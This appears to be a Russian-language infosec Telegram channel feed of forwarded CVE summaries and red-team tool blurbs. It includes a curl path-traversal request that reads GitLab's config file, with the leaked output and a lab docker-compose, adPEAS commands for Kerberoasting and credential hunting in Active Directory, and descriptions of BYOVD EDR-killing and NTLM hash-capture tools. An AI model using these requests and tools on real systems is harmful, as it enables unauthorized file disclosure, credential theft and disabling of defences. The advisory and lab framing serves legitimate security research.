Авторский канал об информационной безопасности
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое
Edu only
Автор: @exited3n
Post #785
387
WH @wh_lab
Forwarded from OFFZONE
ntdsai.dll - WriteSPNScript function) Active Directory формирует команду на основе внешних данных, но не экранирует или некорректно экранирует специальные символы (8.8 по CVSS 3.1)Windows Server с 2012 по 2025

It is built for penetration testing and red team workflows where you have access to a running browser's CDP endpoint and want to inspect browser state, collect artifacts, or browse through the user's browser context
Forwarded from OffensiveMentor

NTLMv2 hash capture tool in pure Go zero deps, single static binary.
Poisons LLMNR / NBT-NS / mDNS and captures over SMB, HTTP, FTP, LDAP, MSSQL, Kerberos and more

AMSI (Antimalware Scan Interface) is a Windows interface that allows applications and services to scan script content for malicious usage. If a signature is registered by the AMSI antimalware service provider (Windows Defender by default), it will be blocked
Whitehat Lab ⚙ Bring Your Own Vulnerable Driver Коллекция PoC'ов, демонстрирующих, как уязвимые драйверы могут быть использованы для отключения AV/EDR Техника, при которой атакующий использует легитимный драйвер с действительной цифровой подписью, содержащий известную…

Kernel-mode process terminator using a signed BYOVD driver. Works on all Windows 10/11
The tool is a single self-contained executable. It installs the driver through the Service Control Manager, performs the kill, then stops and deletes the service, leaving no persistent artifact behind. Targets are configurable at runtime through a config file, command line, or the built-in defaults

Техника, при которой атакующий использует легитимный драйвер с действительной цифровой подписью, содержащий известную уязвимость, для получения несанкционированного доступа к режиму ядра операционной системы

By leveraging CVE-2026-55040, a remote unauthenticated attacker can assume the identity of any SharePoint site user; the prerequisite is the attacker must know in advance the user they wish to identify as. This can be achieved in a number of ways, including via a user’s Active Directory (AD) Security ID (SID), or via a user’s AD User Principal Name (UPN)

The premier cybersecurity event of the year returns to Mandalay Bay with a re-engineered, six-day program built to ignite innovation, push boundaries, and bring the global security community together like never before

🐥 8.7 до 19.1.7 включительно
🐥 19.2 до 19.2.5 включительно
🐥 19.3 до 19.3.1 включительно
curl -sk -X POST \
"https://gitlab.example.com/api/v4/projects/35/repository/commits/?file=&file.path=%2Fopt%2Fgitlab%2Fembedded%2Fservice%2Fgitlab-rails%2Fconfig%2Fgitlab.yml&file.size=1&Content-Type=application/x-www-form-urlencoded"
{"message":"400 Bad request - Invalid parameter: invalid %-encoding (## GitLab settings\n gitlab:\n host: gitlab.example.com\n ... )"}services:
gitlab:
image: gitlab/gitlab-ce:19.3.1-ce.0
container_name: cve-2026-85706-gitlab
hostname: gitlab.lab
restart: "no"
shm_size: "256m"
ports:
- "127.0.0.1:8929:80" # web / API
- "127.0.0.1:2224:22" # ssh (optional)
environment:
GITLAB_OMNIBUS_CONFIG: |
external_url 'http://127.0.0.1:8929'
gitlab_rails['initial_root_password'] = 'CVE-2026-85706-Lab!'
prometheus_monitoring['enable'] = false
gitlab_rails['log_level'] = 'info'
volumes:
- gitlab-config:/etc/gitlab
- gitlab-logs:/var/log/gitlab
- gitlab-data:/var/opt/gitlab
volumes:
gitlab-config:
gitlab-logs:
gitlab-data:
docker compose -f docker-compose.yml up -d
Whitehat Lab 💻 AWSHound Collects AWS IAM/authorization data and builds a BloodHound OpenGraph Установка в BH CE: Administration → Early Access Features and enable OpenGraph Extension Management if it is present and switched off Administration → OpenGraph Management and…

A tool to help pentesters quickly identify privileged principals and second-order privilege escalation opportunities in unfamiliar AWS environments

Collects AWS IAM/authorization data and builds a BloodHound OpenGraph
Administration → Early Access Features and enable OpenGraph Extension Management if it is present and switched off
Administration → OpenGraph Management and upload schema/schema.json
Check the extension appears as AWS (AWSHound), namespace AWS, at the version you expect
Quick Upload, and upload graph.zip
File Ingest, and wait for ingest and analysis to finish

Import-Module .\adPEAS.ps1
Invoke-adPEAS
Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках
Rights - поиск различных прав, например LAPS, DCSync и т.д.
GPO - базовая информация о групповых политиках
ADCS - информация о центрах сертификации
Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.
Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей
Accounts - информация об аккаунтах
Computer - AD DS, AD CS, Exchange серверы и т.д.
BloodHound - сборщик данных для BH
Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'
$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred
Invoke-adPEAS -Module Domain
Invoke-adPEAS -Module Rights
Invoke-adPEAS -Module GPO
Invoke-adPEAS -Module ADCS
Invoke-adPEAS -Module Creds
Invoke-adPEAS -Module Delegation
Invoke-adPEAS -Module Accounts
Invoke-adPEAS -Module Computer
Invoke-adPEAS -Module Bloodhound -Scope All

Unauthenticated session forgery on Citrix NetScaler ADC / NetScaler Gateway via the SAML HTTP-Redirect binding handler at GET /cgi/samlauth. CVSS 4.0 9.3, CWE-288. Bulletin CTX696939 (2026-08-19), no workarounds
Немедленно обновить все уязвимые устройства до версий 14.1-73.32 (для ветки 14.1) или 13.1-63.21 (для ветки 13.1)

Critical command injection vulnerability in cPanel & WHM versions 11.x that allows an authenticated cPanel user to execute arbitrary system commands with root privileges via the domain parking functionality
11.110.0.140 и ниже
11.134.0.52 и ниже
11.136.0.36 и ниже
11.138.0.1 и ниже

A single, searchable directory of the community's Living-Off-the-Land security research - every LOLBin, LOLDriver, and adjacent project, indexed and cross-referenced by platform and focus area